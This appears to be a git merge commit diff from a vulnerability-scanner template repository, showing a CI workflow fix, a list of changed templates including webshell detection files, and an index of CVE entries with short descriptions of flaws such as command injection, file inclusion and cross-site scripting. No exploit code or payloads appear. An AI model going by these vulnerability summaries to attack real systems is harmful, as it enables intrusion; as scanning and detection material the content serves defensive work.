Merge remote-tracking branch 'origin' into pussycat0x-1

patch-1
sandeep 2023-07-04 15:42:58 +05:30
commit 187fab91ee
251 changed files with 823 additions and 492 deletions

View File

@ -5,7 +5,7 @@ on:
branches: branches:
- main - main
paths: paths:
- 'http/cves/' - 'http/cves/**'
workflow_dispatch: # allows manual triggering of the workflow workflow_dispatch: # allows manual triggering of the workflow
jobs: jobs:
@ -36,7 +36,7 @@ jobs:
git commit -m "Auto Generated cves.json [$(date)] :robot:" -a git commit -m "Auto Generated cves.json [$(date)] :robot:" -a
- name: Push changes - name: Push changes
if: steps.checksum.outputs.CHANGES > 0 if: steps.cves.outputs.CHANGES > 0
run: | run: |
git pull --rebase git pull --rebase
git push origin ${{ github.ref }} git push origin ${{ github.ref }}

View File

@ -1,2 +1,9 @@
file/webshell/asp-webshell.yaml
file/webshell/jsp-webshell.yaml
file/webshell/php-webshell.yaml
http/cves/2018/CVE-2018-6530.yaml
http/cves/2023/CVE-2023-28121.yaml
http/exposed-panels/arangodb-web-Interface.yaml
http/exposed-panels/dell-idrac.yaml
http/exposed-panels/pritunl-panel.yaml http/exposed-panels/pritunl-panel.yaml
http/exposed-panels/untangle-admin-login.yaml http/exposed-panels/untangle-admin-login.yaml

View File

@ -1,5 +1,5 @@
{"ID":"CVE-2000-0114","Info":{"Name":"Microsoft FrontPage Extensions Check (shtml.dll)","Severity":"low","Description":"Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2000/CVE-2000-0114.yaml"} {"ID":"CVE-2000-0114","Info":{"Name":"Microsoft FrontPage Extensions Check (shtml.dll)","Severity":"low","Description":"Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2000/CVE-2000-0114.yaml"}
{"ID":"CVE-2001-0537","Info":{"Name":"Cisco IOS HTTP Configuration Arbitrary Administrative Access","Severity":"medium","Description":"HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2001/CVE-2001-0537.yaml"} {"ID":"CVE-2001-0537","Info":{"Name":"Cisco IOS HTTP Configuration - Authentication Bypass","Severity":"medium","Description":"HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.\n","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2001/CVE-2001-0537.yaml"}
{"ID":"CVE-2002-1131","Info":{"Name":"SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting","Severity":"medium","Description":"The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2002/CVE-2002-1131.yaml"} {"ID":"CVE-2002-1131","Info":{"Name":"SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting","Severity":"medium","Description":"The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2002/CVE-2002-1131.yaml"}
{"ID":"CVE-2004-0519","Info":{"Name":"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2004/CVE-2004-0519.yaml"} {"ID":"CVE-2004-0519","Info":{"Name":"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2004/CVE-2004-0519.yaml"}
{"ID":"CVE-2004-1965","Info":{"Name":"Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS","Severity":"medium","Description":"Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2004/CVE-2004-1965.yaml"} {"ID":"CVE-2004-1965","Info":{"Name":"Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS","Severity":"medium","Description":"Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2004/CVE-2004-1965.yaml"}
@ -194,6 +194,7 @@
{"ID":"CVE-2012-4940","Info":{"Name":"Axigen Mail Server Filename Directory Traversal","Severity":"high","Description":"Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI.","Classification":{"CVSSScore":"6.4"}},"file_path":"http/cves/2012/CVE-2012-4940.yaml"} {"ID":"CVE-2012-4940","Info":{"Name":"Axigen Mail Server Filename Directory Traversal","Severity":"high","Description":"Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI.","Classification":{"CVSSScore":"6.4"}},"file_path":"http/cves/2012/CVE-2012-4940.yaml"}
{"ID":"CVE-2012-4982","Info":{"Name":"Forescout CounterACT 6.3.4.1 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in assets/login on the Forescout CounterACT NAC device before 7.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the 'a' parameter.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2012/CVE-2012-4982.yaml"} {"ID":"CVE-2012-4982","Info":{"Name":"Forescout CounterACT 6.3.4.1 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in assets/login on the Forescout CounterACT NAC device before 7.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the 'a' parameter.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2012/CVE-2012-4982.yaml"}
{"ID":"CVE-2012-5913","Info":{"Name":"WordPress Integrator 1.32 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-5913.yaml"} {"ID":"CVE-2012-5913","Info":{"Name":"WordPress Integrator 1.32 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-5913.yaml"}
{"ID":"CVE-2012-6499","Info":{"Name":"WordPress Plugin Age Verification v0.4 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2012/CVE-2012-6499.yaml"}
{"ID":"CVE-2013-1965","Info":{"Name":"Apache Struts2 S2-012 RCE","Severity":"critical","Description":"Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2013/CVE-2013-1965.yaml"} {"ID":"CVE-2013-1965","Info":{"Name":"Apache Struts2 S2-012 RCE","Severity":"critical","Description":"Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2013/CVE-2013-1965.yaml"}
{"ID":"CVE-2013-2248","Info":{"Name":"Apache Struts - Multiple Open Redirection Vulnerabilities","Severity":"medium","Description":"Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2013/CVE-2013-2248.yaml"} {"ID":"CVE-2013-2248","Info":{"Name":"Apache Struts - Multiple Open Redirection Vulnerabilities","Severity":"medium","Description":"Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2013/CVE-2013-2248.yaml"}
{"ID":"CVE-2013-2251","Info":{"Name":"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution","Severity":"critical","Description":"In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\", or \"redirectAction:\" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. This introduces the possibility to inject server side code.","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2013/CVE-2013-2251.yaml"} {"ID":"CVE-2013-2251","Info":{"Name":"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution","Severity":"critical","Description":"In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\", or \"redirectAction:\" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. This introduces the possibility to inject server side code.","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2013/CVE-2013-2251.yaml"}
@ -561,6 +562,7 @@
{"ID":"CVE-2018-6008","Info":{"Name":"Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion","Severity":"high","Description":"Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-6008.yaml"} {"ID":"CVE-2018-6008","Info":{"Name":"Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion","Severity":"high","Description":"Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-6008.yaml"}
{"ID":"CVE-2018-6184","Info":{"Name":"Zeit Next.js \u003c4.2.3 - Local File Inclusion","Severity":"high","Description":"Zeit Next.js before 4.2.3 is susceptible to local file inclusion under the /_next request namespace. An attacker can obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-6184.yaml"} {"ID":"CVE-2018-6184","Info":{"Name":"Zeit Next.js \u003c4.2.3 - Local File Inclusion","Severity":"high","Description":"Zeit Next.js before 4.2.3 is susceptible to local file inclusion under the /_next request namespace. An attacker can obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-6184.yaml"}
{"ID":"CVE-2018-6200","Info":{"Name":"vBulletin - Open Redirect","Severity":"medium","Description":"vBulletin 3.x.x and 4.2.x through 4.2.5 contains an open redirect vulnerability via the redirector.php URL parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-6200.yaml"} {"ID":"CVE-2018-6200","Info":{"Name":"vBulletin - Open Redirect","Severity":"medium","Description":"vBulletin 3.x.x and 4.2.x through 4.2.5 contains an open redirect vulnerability via the redirector.php URL parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-6200.yaml"}
{"ID":"CVE-2018-6530","Info":{"Name":"D-Link - Unauthenticated Remote Code Execution","Severity":"critical","Description":"OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-6530.yaml"}
{"ID":"CVE-2018-6910","Info":{"Name":"DedeCMS 5.7 - Path Disclosure","Severity":"high","Description":"DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-6910.yaml"} {"ID":"CVE-2018-6910","Info":{"Name":"DedeCMS 5.7 - Path Disclosure","Severity":"high","Description":"DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-6910.yaml"}
{"ID":"CVE-2018-7251","Info":{"Name":"Anchor CMS 0.12.3 - Error Log Exposure","Severity":"critical","Description":"Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as \"Too many connections\") has occurred.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7251.yaml"} {"ID":"CVE-2018-7251","Info":{"Name":"Anchor CMS 0.12.3 - Error Log Exposure","Severity":"critical","Description":"Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as \"Too many connections\") has occurred.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7251.yaml"}
{"ID":"CVE-2018-7422","Info":{"Name":"WordPress Site Editor \u003c=1.1.1 - Local File Inclusion","Severity":"high","Description":"WordPress Site Editor through 1.1.1 allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-7422.yaml"} {"ID":"CVE-2018-7422","Info":{"Name":"WordPress Site Editor \u003c=1.1.1 - Local File Inclusion","Severity":"high","Description":"WordPress Site Editor through 1.1.1 allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-7422.yaml"}
@ -1379,6 +1381,7 @@
{"ID":"CVE-2021-46417","Info":{"Name":"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion","Severity":"high","Description":"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-46417.yaml"} {"ID":"CVE-2021-46417","Info":{"Name":"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion","Severity":"high","Description":"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-46417.yaml"}
{"ID":"CVE-2021-46422","Info":{"Name":"SDT-CW3B1 1.1.0 - OS Command Injection","Severity":"critical","Description":"Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-46422.yaml"} {"ID":"CVE-2021-46422","Info":{"Name":"SDT-CW3B1 1.1.0 - OS Command Injection","Severity":"critical","Description":"Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-46422.yaml"}
{"ID":"CVE-2021-46424","Info":{"Name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","Severity":"critical","Description":"Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2021/CVE-2021-46424.yaml"} {"ID":"CVE-2021-46424","Info":{"Name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","Severity":"critical","Description":"Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2021/CVE-2021-46424.yaml"}
{"ID":"CVE-2021-46704","Info":{"Name":"GenieACS =\u003e 1.2.8 - OS Command Injection","Severity":"critical","Description":"In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-46704.yaml"}
{"ID":"CVE-2022-0140","Info":{"Name":"WordPress Visual Form Builder \u003c3.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Visual Form Builder plugin before 3.0.8 contains a cross-site scripting vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-0140.yaml"} {"ID":"CVE-2022-0140","Info":{"Name":"WordPress Visual Form Builder \u003c3.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Visual Form Builder plugin before 3.0.8 contains a cross-site scripting vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-0140.yaml"}
{"ID":"CVE-2022-0147","Info":{"Name":"WordPress Cookie Information/Free GDPR Consent Solution \u003c2.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0147.yaml"} {"ID":"CVE-2022-0147","Info":{"Name":"WordPress Cookie Information/Free GDPR Consent Solution \u003c2.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0147.yaml"}
{"ID":"CVE-2022-0148","Info":{"Name":"WordPress All-in-one Floating Contact Form \u003c2.0.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-0148.yaml"} {"ID":"CVE-2022-0148","Info":{"Name":"WordPress All-in-one Floating Contact Form \u003c2.0.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-0148.yaml"}
@ -1717,6 +1720,7 @@
{"ID":"CVE-2022-3982","Info":{"Name":"WordPress Booking Calendar \u003c3.2.2 - Arbitrary File Upload","Severity":"critical","Description":"WordPress Booking Calendar plugin before 3.2.2 is susceptible to arbitrary file upload possibly leading to remote code execution. The plugin does not validate uploaded files, which can allow an attacker to upload arbitrary files, such as PHP, and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-3982.yaml"} {"ID":"CVE-2022-3982","Info":{"Name":"WordPress Booking Calendar \u003c3.2.2 - Arbitrary File Upload","Severity":"critical","Description":"WordPress Booking Calendar plugin before 3.2.2 is susceptible to arbitrary file upload possibly leading to remote code execution. The plugin does not validate uploaded files, which can allow an attacker to upload arbitrary files, such as PHP, and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-3982.yaml"}
{"ID":"CVE-2022-39952","Info":{"Name":"Fortinet FortiNAC - Arbitrary File Write","Severity":"critical","Description":"Fortinet FortiNAC is susceptible to arbitrary file write. An external control of the file name or path can allow an attacker to execute unauthorized code or commands via specifically crafted HTTP request, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. Affected versions are 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, and 8.3.7.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-39952.yaml"} {"ID":"CVE-2022-39952","Info":{"Name":"Fortinet FortiNAC - Arbitrary File Write","Severity":"critical","Description":"Fortinet FortiNAC is susceptible to arbitrary file write. An external control of the file name or path can allow an attacker to execute unauthorized code or commands via specifically crafted HTTP request, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. Affected versions are 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, and 8.3.7.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-39952.yaml"}
{"ID":"CVE-2022-39960","Info":{"Name":"Jira Netic Group Export \u003c1.0.3 - Missing Authorization","Severity":"medium","Description":"Jira Netic Group Export add-on before 1.0.3 contains a missing authorization vulnerability. The add-on does not perform authorization checks, which can allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-39960.yaml"} {"ID":"CVE-2022-39960","Info":{"Name":"Jira Netic Group Export \u003c1.0.3 - Missing Authorization","Severity":"medium","Description":"Jira Netic Group Export add-on before 1.0.3 contains a missing authorization vulnerability. The add-on does not perform authorization checks, which can allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-39960.yaml"}
{"ID":"CVE-2022-40022","Info":{"Name":"Symmetricom SyncServer Unauthenticated - Remote Command Execution","Severity":"critical","Description":"Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-40022.yaml"}
{"ID":"CVE-2022-40083","Info":{"Name":"Labstack Echo 4.8.0 - Open Redirect","Severity":"critical","Description":"Labstack Echo 4.8.0 contains an open redirect vulnerability via the Static Handler component. An attacker can leverage this vulnerability to cause server-side request forgery, making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2022/CVE-2022-40083.yaml"} {"ID":"CVE-2022-40083","Info":{"Name":"Labstack Echo 4.8.0 - Open Redirect","Severity":"critical","Description":"Labstack Echo 4.8.0 contains an open redirect vulnerability via the Static Handler component. An attacker can leverage this vulnerability to cause server-side request forgery, making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2022/CVE-2022-40083.yaml"}
{"ID":"CVE-2022-40359","Info":{"Name":"Kae's File Manager \u003c=1.4.7 - Cross-Site Scripting","Severity":"medium","Description":"Kae's File Manager through 1.4.7 contains a cross-site scripting vulnerability via a crafted GET request to /kfm/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-40359.yaml"} {"ID":"CVE-2022-40359","Info":{"Name":"Kae's File Manager \u003c=1.4.7 - Cross-Site Scripting","Severity":"medium","Description":"Kae's File Manager through 1.4.7 contains a cross-site scripting vulnerability via a crafted GET request to /kfm/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-40359.yaml"}
{"ID":"CVE-2022-4050","Info":{"Name":"WordPress JoomSport \u003c5.2.8 - SQL Injection","Severity":"critical","Description":"WordPress JoomSport plugin before 5.2.8 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4050.yaml"} {"ID":"CVE-2022-4050","Info":{"Name":"WordPress JoomSport \u003c5.2.8 - SQL Injection","Severity":"critical","Description":"WordPress JoomSport plugin before 5.2.8 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4050.yaml"}
@ -1776,9 +1780,13 @@
{"ID":"CVE-2022-48165","Info":{"Name":"Wavlink - Improper Access Control","Severity":"high","Description":"Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-48165.yaml"} {"ID":"CVE-2022-48165","Info":{"Name":"Wavlink - Improper Access Control","Severity":"high","Description":"Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-48165.yaml"}
{"ID":"CVE-2022-4897","Info":{"Name":"WordPress BackupBuddy \u003c8.8.3 - Cross Site Scripting","Severity":"medium","Description":"WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4897.yaml"} {"ID":"CVE-2022-4897","Info":{"Name":"WordPress BackupBuddy \u003c8.8.3 - Cross Site Scripting","Severity":"medium","Description":"WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4897.yaml"}
{"ID":"CVE-2023-0099","Info":{"Name":"Simple URLs \u003c 115 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-0099.yaml"} {"ID":"CVE-2023-0099","Info":{"Name":"Simple URLs \u003c 115 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-0099.yaml"}
